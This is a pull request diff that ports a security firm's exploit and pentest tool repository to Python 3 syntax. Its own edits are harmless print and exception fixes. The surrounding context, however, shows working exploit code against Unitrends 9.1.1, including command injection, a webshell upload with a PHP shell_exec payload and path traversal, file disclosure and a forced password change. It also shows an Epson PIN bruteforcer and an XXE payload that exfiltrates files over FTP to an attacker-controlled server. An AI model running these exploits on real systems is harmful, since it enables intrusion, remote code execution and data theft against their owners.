### PR TITLE
Modernize Python 2 code to get ready for Python 3

### DIFF
--- a/exploits/Epson/easymp-bruteforcer.py
+++ b/exploits/Epson/easymp-bruteforcer.py
@@ -1,3 +1,4 @@
+from __future__ import print_function
 import binascii
 import socket
 
@@ -31,7 +32,7 @@ for i in range(0,9999):
 
     packet = packet[50]
     if packet != "0":
-        print("Success! Keyword is: ",i)
+        print(("Success! Keyword is: ",i))
         break
 
 

--- a/exploits/Epson/easymp-pintest.py
+++ b/exploits/Epson/easymp-pintest.py
@@ -1,3 +1,4 @@
+from __future__ import print_function
 import binascii
 import socket
 

--- a/exploits/Unitrends/CVE-2017-7280-RCE-Password-Change/change_pass_code_exec.py
+++ b/exploits/Unitrends/CVE-2017-7280-RCE-Password-Change/change_pass_code_exec.py
@@ -1,9 +1,15 @@
 #!/usr/bin/python
+from __future__ import print_function
 import requests
 import optparse
 import json
 from requests.packages.urllib3.exceptions import InsecureRequestWarning
 from urllib import base64, unquote
+
+try:
+    raw_input          # Python 2
+except NameError:
+    raw_input = input  # Python 3
 
 def main():
 	parser = optparse.OptionParser("%prog -u https://url_to_unitrends_server.com -U root -P root_pass")
@@ -11,17 +17,17 @@ def main():
 	parser.add_option("-u", dest="url", type="string", help="URL or IP of Unitrends server.")
 	parser.add_option("-P", dest="password", type="string", help="Root user's password.")
 	(options, args) = parser.parse_args()
-	print "[+] Unitrends 9.1.1 RCE via Password Change Exploit"
-	print "[+] Created by Dwight H. from Rhino Security Labs"
+	print("[+] Unitrends 9.1.1 RCE via Password Change Exploit")
+	print("[+] Created by Dwight H. from Rhino Security Labs")
 	if not options.url or not(options.username and options.password):
-		print "[-] Not enough arguments given."
+		print("[-] Not enough arguments given.")
 		return
 	s = requests.Session()
 	url = options.url
 	if url[-1] == "/":
 		url = url[:-1]
 	login = {"username": options.username, "password": options.password}
-	print "[+] Attempting to login with {}:{}".format(options.username, options.password)
+	print("[+] Attempting to login with {}:{}".format(options.username, options.password))
 	# Disable logging messages all the time
 	requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
 	r = s.get(url, verify=False)
@@ -29,11 +35,11 @@ def main():
 	superuser_data = r.json()
 	auth_string = superuser_data.get('auth_token')
 	if auth_string:
-		print "[+] Authentication successful."
+		print("[+] Authentication successful.")
 	else:
-		print "[-] Authentication not successful."
+		print("[-] Authentication not successful.")
 		return
-	print "[+] Dropping into command prompt. (Note: No return value from command will be returned)"
+	print("[+] Dropping into command prompt. (Note: No return value from command will be returned)")
 	try:
 		while True:
 			cmd = raw_input("#> ")
@@ -44,9 +50,9 @@ def main():
 				"user": "`{}`".format(cmd)
 			}
 			r = s.post(url + "/recoveryconsole/bpl/password.php?type=list&rx=8898009&ver=9.1.1&gcv=0", data=data, verify=False)
-			print r.content
+			print(r.content)
 	except KeyboardInterrupt:
-		print "\n[+] Exiting."
+		print("\n[+] Exiting.")
 
 if __name__== "__main__":
 	main()

--- a/exploits/Unitrends/CVE-2017-7281-RCE-File-Upload/webshell_exploit.py
+++ b/exploits/Unitrends/CVE-2017-7281-RCE-File-Upload/webshell_exploit.py
@@ -1,4 +1,5 @@
 #!/usr/bin/python
+from __future__ import print_function
 import requests
 import optparse
 import json
@@ -7,6 +8,11 @@ from random import randint
 import xml.etree.ElementTree as ET
 from requests.packages.urllib3.exceptions import InsecureRequestWarning
 
+try:
+    raw_input          # Python 2
+except NameError:
+    raw_input = input  # Python 3
+
 def main():
 	parser = optparse.OptionParser("%prog -u https://url_to_unitrends_server.com -U root -P root_pass [-S session_cookie]")
 	parser.add_option("-U", dest="username", type="string", help="Username with root privledges to login to Admin interface.")
@@ -14,10 +20,10 @@ def main():
 	parser.add_option("-P", dest="password", type="string", help="Root user's password.")
 	parser.add_option("-a", dest="auth_string", type="string", help="Auth string from valid session of unitrends root user.")
 	(options, args) = parser.parse_args()
-	print "[+] Unitrends 9.1.1 Webshell Upload Exec Exploit"
-	print "[+] Created by Dwight H. from Rhino Security Labs"
+	print("[+] Unitrends 9.1.1 Webshell Upload Exec Exploit")
+	print("[+] Created by Dwight H. from Rhino Security Labs")
 	if not options.url or not((options.username and options.password) or options.auth_string):
-		print "[-] Not enough arguments given."
+		print("[-] Not enough arguments given.")
 		return
 	s = requests.Session()
 	url = options.url
@@ -25,7 +31,7 @@ def main():
 		url = url[:-1]
 	auth_string = options.auth_string
 	if not auth_string:
-		print "[+] Attempting to login with {}:{}".format(options.username, options.password)
+		print("[+] Attempting to login with {}:{}".format(options.username, options.password))
 		# Disable logging messages all the time
 		requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
 		r = s.get(url, verify=False)
@@ -34,9 +40,9 @@ def main():
 		superuser_data = r.json()
 		auth_string = superuser_data.get('auth_token')
 		if auth_string:
-			print "[+] Authentication successful. Dropping into command prompt. (Note: No return value from command will be returned)"
+			print("[+] Authentication successful. Dropping into command prompt. (Note: No return value from command will be returned)")
 		else:
-			print "[-] Authentication not successful."
+			print("[-] Authentication not successful.")
 			return
 	fname = randint(0,10000)
 	r = s.get(url + "/recoveryconsole/bpl/reports.php?type=file&report=php&name=../../../../../../../../var/www/html/tempPDF/{}&contents=<?php echo shell_exec($_GET['e']); ?>&auth={}".format(fname, auth_string), verify=False)
@@ -44,15 +50,15 @@ def main():
 	disk_loc = root[0].text.strip()
 	webshell_url = disk_loc[disk_loc.find("/tempPDF"):]
 	webshell_url = url + webshell_url
-	print "[+] Webshell uploaded to {}".format(webshell_url)
-	print "[+] Dropping to command line."
+	print("[+] Webshell uploaded to {}".format(webshell_url))
+	print("[+] Dropping to command line.")
 	try:
 		while True:
 			cmd = raw_input("#> ")
 			r = s.post(webshell_url + "?e=" + cmd, verify=False)
-			print r.content
+			print(r.content)
 	except KeyboardInterrupt:
-		print '\n[+] Exiting.'
+		print('\n[+] Exiting.')
 
 if __name__== "__main__":
 	main()

--- a/exploits/Unitrends/CVE-2017-7282-LFI/lfi_exploit.py
+++ b/exploits/Unitrends/CVE-2017-7282-LFI/lfi_exploit.py
@@ -1,8 +1,14 @@
 #!/usr/bin/python
+from __future__ import print_function
 import requests
 import optparse
 import json
 from requests.packages.urllib3.exceptions import InsecureRequestWarning
+
+try:
+    raw_input          # Python 2
+except NameError:
+    raw_input = input  # Python 3
 
 def main():
 	parser = optparse.OptionParser("%prog -u https://url_to_unitrends_server.com -U root -P root_pass [-S session_cookie]")
@@ -11,10 +17,10 @@ def main():
 	parser.add_option("-P", dest="password", type="string", help="Root user's password.")
 	parser.add_option("-a", dest="auth_string", type="string", help="Authentication string of a logged in user.")
 	(options, args) = parser.parse_args()
-	print "[+] Unitrends 9.1.1 LFI Exploit"
-	print "[+] Created by Dwight H. from Rhino Security Labs"
+	print("[+] Unitrends 9.1.1 LFI Exploit")
+	print("[+] Created by Dwight H. from Rhino Security Labs")
 	if not options.url or not((options.username and options.password) or options.session):
-		print "[-] Not enough arguments given."
+		print("[-] Not enough arguments given.")
 		return
 	s = requests.Session()
 	url = options.url
@@ -22,7 +28,7 @@ def main():
 		url = url[:-1]
 	auth_string = options.auth_string
 	if not auth_string:
-		print "[+] Attempting to login with {}:{}".format(options.username, options.password)
+		print("[+] Attempting to login with {}:{}".format(options.username, options.password))
 		# Disable logging messages all the time
 		requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
 		r = s.get(url, verify=False)
@@ -31,11 +37,11 @@ def main():
 		superuser_data = r.json()
 		auth_string = superuser_data.get('auth_token')
 		if auth_string:
-			print "[+] Authentication successful."
+			print("[+] Authentication successful.")
 		else:
-			print "[-] Authentication not successful."
+			print("[-] Authentication not successful.")
 			return
-	print "[+] Dropping into command prompt."
+	print("[+] Dropping into command prompt.")
 	headers = {"AuthToken": auth_string}
 	try:
 		while True:
@@ -44,9 +50,9 @@ def main():
 				"filename": fname
 			}
 			r = s.post(url + "/api/restore/download", data=json.dumps(data), headers=headers, verify=False)
-			print r.content
+			print(r.content)
 	except KeyboardInterrupt:
-		print "\n[+] Exiting"
+		print("\n[+] Exiting")
 
 if __name__== "__main__":
 	main()

--- a/exploits/Unitrends/CVE-2017-7283-RCE-Restore-File/rce_via_restore_exploit.py
+++ b/exploits/Unitrends/CVE-2017-7283-RCE-Restore-File/rce_via_restore_exploit.py
@@ -1,8 +1,14 @@
 #!/usr/bin/python
+from __future__ import print_function
 import requests
 import optparse
 import json
 from requests.packages.urllib3.exceptions import InsecureRequestWarning
+
+try:
+    raw_input          # Python 2
+except NameError:
+    raw_input = input  # Python 3
 
 def main():
 	parser = optparse.OptionParser("%prog -u https://url_to_unitrends_server.com -U root -P root_pass [-S session_cookie]")
@@ -11,10 +17,10 @@ def main():
 	parser.add_option("-P", dest="password", type="string", help="Root user's password.")
 	parser.add_option("-a", dest="auth_string", type="string", help="Authentication string of a logged in user.")
 	(options, args) = parser.parse_args()
-	print "[+] Unitrends 9.1.1 RCE via Restore Exploit"
-	print "[+] Created by Dwight H. from Rhino Security Labs"
+	print("[+] Unitrends 9.1.1 RCE via Restore Exploit")
+	print("[+] Created by Dwight H. from Rhino Security Labs")
 	if not options.url or not((options.username and options.password) or options.session):
-		print "[-] Not enough arguments given."
+		print("[-] Not enough arguments given.")
 		return
 	s = requests.Session()
 	url = options.url
@@ -22,7 +28,7 @@ def main():
 		url = url[:-1]
 	auth_string = options.auth_string
 	if not auth_string:
-		print "[+] Attempting to login with {}:{}".format(options.username, options.password)
+		print("[+] Attempting to login with {}:{}".format(options.username, options.password))
 		# Disable logging messages all the time
 		requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
 		r = s.get(url, verify=False)
@@ -31,11 +37,11 @@ def main():
 		superuser_data = r.json()
 		auth_string = superuser_data.get('auth_token')
 		if auth_string:
-			print "[+] Authentication successful."
+			print("[+] Authentication successful.")
 		else:
-			print "[-] Authentication not successful."
+			print("[-] Authentication not successful.")
 			return
-	print "[+] Dropping into command prompt. (Note: No return text for your command will be available.)"
+	print("[+] Dropping into command prompt. (Note: No return text for your command will be available.)")
 	headers = {"AuthToken": auth_string}
 	try:
 		while True:
@@ -44,9 +50,9 @@ def main():
 				"filenames": ["'\n{}\n".format(cmd)]
 			}
 			r = s.post(url + "/api/restore/download-files", data=json.dumps(data), headers=headers, verify=False)
-			print r.content
+			print(r.content)
 	except KeyboardInterrupt:
-		print "\n[+] Exiting"
+		print("\n[+] Exiting")
 
 if __name__== "__main__":
 	main()

--- a/exploits/Unitrends/CVE-2017-7284-Remote-Password-Change/change_pass.py
+++ b/exploits/Unitrends/CVE-2017-7284-Remote-Password-Change/change_pass.py
@@ -1,4 +1,5 @@
 #!/usr/bin/python
+from __future__ import print_function
 import requests
 import optparse
 import json
@@ -12,10 +13,10 @@ def main():
     parser.add_option("-P", dest="password", type="string", default="unitrends1", help="Password to set. Default is unitrends1.")
     parser.add_option("-a", dest="auth_string", type="string", help="Authentication string of a logged in user.")
     (options, args) = parser.parse_args()
-    print "[+] Unitrends 9.1.1 Force Password Change"
-    print "[+] Created by Dwight H. from Rhino Security Labs"
+    print("[+] Unitrends 9.1.1 Force Password Change")
+    print("[+] Created by Dwight H. from Rhino Security Labs")
     if not options.url or not options.auth_string:
-        print "[-] Not enough arguments given."
+        print("[-] Not enough arguments given.")
         return
     s = requests.Session()
     url = options.url
@@ -35,13 +36,13 @@ def main():
         "force": True,
     }
     r = s.put(url + "/api/users/{}/?sid=undefined".format(uid), headers=headers, data=json.dumps(data), verify=False)
-    print r.content
-    print r.status_code
-    print r.reason
+    print(r.content)
+    print(r.status_code)
+    print(r.reason)
     if '"code":"0"' in r.content:
-        print "[+] Login credentials are now {}:{}".format(uname, password)
+        print("[+] Login credentials are now {}:{}".format(uname, password))
     else:
-        print "Password change failed."
-        print r.content
+        print("Password change failed.")
+        print(r.content)
 if __name__== "__main__":
     main()

--- a/tools/aws-pentest-tools/s3/buckethead.py
+++ b/tools/aws-pentest-tools/s3/buckethead.py
@@ -1,5 +1,6 @@
 #!/usr/bin/env python3
 # Author: Dwight Hohnstein, Rhino Security Labs (dwight.hohnstein@rhinosecuritylabs.com)
+from __future__ import print_function
 from subprocess import check_output, CalledProcessError
 from os import devnull
 import logging

--- a/tools/cfire/cfire.py
+++ b/tools/cfire/cfire.py
@@ -28,6 +28,7 @@
 # Rhino Security Labs //@hxmonsegur
 
 # Standard libs
+from __future__ import print_function
 import sys
 import os
 import stat
@@ -277,13 +278,13 @@ def ssdeepcompare(target, IP):
     try:
         ss_target = requests.get('http://{}/'.format(target))
         ssdeep_target_fuzz = ssdeep.hash(ss_target.text)
-        print target, ssdeep_target_fuzz
+        print(target, ssdeep_target_fuzz)
         content = requests.get('https://{}'.format(IP), verify=False, timeout = 5, headers = {'Host': target})
         ssdeep_fuzz = ssdeep.hash(content.text)
-        print IP, ssdeep_fuzz
-        print "ssdeep score for", IP, "is", ssdeep.compare(ssdeep_target_fuzz, ssdeep_fuzz)
+        print(IP, ssdeep_fuzz)
+        print("ssdeep score for", IP, "is", ssdeep.compare(ssdeep_target_fuzz, ssdeep_fuzz))
     except(requests.exceptions.ConnectionError):
-        print "cant connect to", IP
+        print("cant connect to", IP)
 
 def main():
     try:

--- a/tools/cfire/lib/cron/cflareupdate.py
+++ b/tools/cfire/lib/cron/cflareupdate.py
@@ -26,6 +26,7 @@
 # Rhino Security Labs //hxm
 
 # For use in making requests
+from __future__ import print_function
 import requests
 
 # For handling command line arguments and parsing

--- a/tools/ms-office/subdoc-injector/subdoc_injector.py
+++ b/tools/ms-office/subdoc-injector/subdoc_injector.py
@@ -8,6 +8,7 @@
 # @hxmonsegur//RSL
 
 # Standard libs
+from __future__ import print_function
 import sys
 import os
 import shutil
@@ -141,15 +142,15 @@ def analyzedoc(infile):
                     print("[+] word/_rels/settings.xml.rels discovered.")
                     with arc.open('word/_rels/settings.xml.rels') as fr:
                         doc = xmltodict.parse(fr.read())
-                    if doc.has_key('Relationships'):
-                        if doc['Relationships']['Relationship'].has_key('@Id'):
+                    if 'Relationships' in doc:
+                        if '@Id' in doc['Relationships']['Relationship']:
                             if doc['Relationships']['Relationship']['@Id'] == 'rId1337':
                                 print("[!] Phishery injection confirmed.")
                                 tURL = doc['Relationships']['Relationship']['@Target']
                                 print("[!] Target URL: {}".format(tURL))
                             else:
                                 print("[!] Relationship discovered is {}".format(doc['Relationships']['Relationship']['@Id']))
-                                if doc['Relationships']['Relationship'].has_key('@Target'):
+                                if '@Target' in doc['Relationships']['Relationship']:
                                     tURL = doc['Relationships']['Relationship']['@Target']
                                     print("[!] Target URL: {}".format(tURL))
                             return True

--- a/tools/python/xxe-server.py
+++ b/tools/python/xxe-server.py
@@ -16,6 +16,7 @@
 # every log file will get sent. Such is the nature
 # of the beast.
 
+from __future__ import print_function
 import SocketServer
 from threading import Thread
 from time import sleep
@@ -43,7 +44,7 @@ payload = """<!ENTITY % all "<!ENTITY send SYSTEM 'ftp://{}:{}/%file;'>">
 %all;"""
 
 def wlog(_str):
-    print _str
+    print(_str)
     logging.info("{}\n".format(_str))
 
 class WebServer(SocketServer.BaseRequestHandler):
@@ -97,7 +98,7 @@ class FTPServer(SocketServer.BaseRequestHandler):
                 else:
                     wlog("[FTP] > 230 more data please!")
                     self.request.sendall("230 more data please!\n")
-        except Exception, e:
+        except Exception as e:
             if "timed out" in e:
                 wlog("[FTP] Client timed out")
             else:
@@ -112,7 +113,7 @@ def start_server(conn, serv_class):
     
 if __name__ == "__main__":
     if not argv[1]:
-        print "[-] Need public IP of this server in order to receive data."
+        print("[-] Need public IP of this server in order to receive data.")
         exit(1)
     WEB_ARGS = ("0.0.0.0", 8888)
     FTP_ARGS = ("0.0.0.0", 2121)
@@ -124,6 +125,6 @@ if __name__ == "__main__":
     try:
         while True:
             sleep(10000)
-    except KeyboardInterrupt, e:
-        print "\n[+] Server shutting down."
+    except KeyboardInterrupt as e:
+        print("\n[+] Server shutting down.")
 


### PR DESCRIPTION
Make the minimal, safe changes required to convert the repo's code to be syntax compatible with both Python 2 and Python 3.  There may be other changes required to complete a port to Python 3 but this PR is a minimal, safe first step.

Run: [futurize --stage1 -w **/*.py](http://python-future.org/futurize_cheatsheet.html)

    See Stage 1: "safe" fixes http://python-future.org/automatic_conversion.html#stage-1-safe-fixes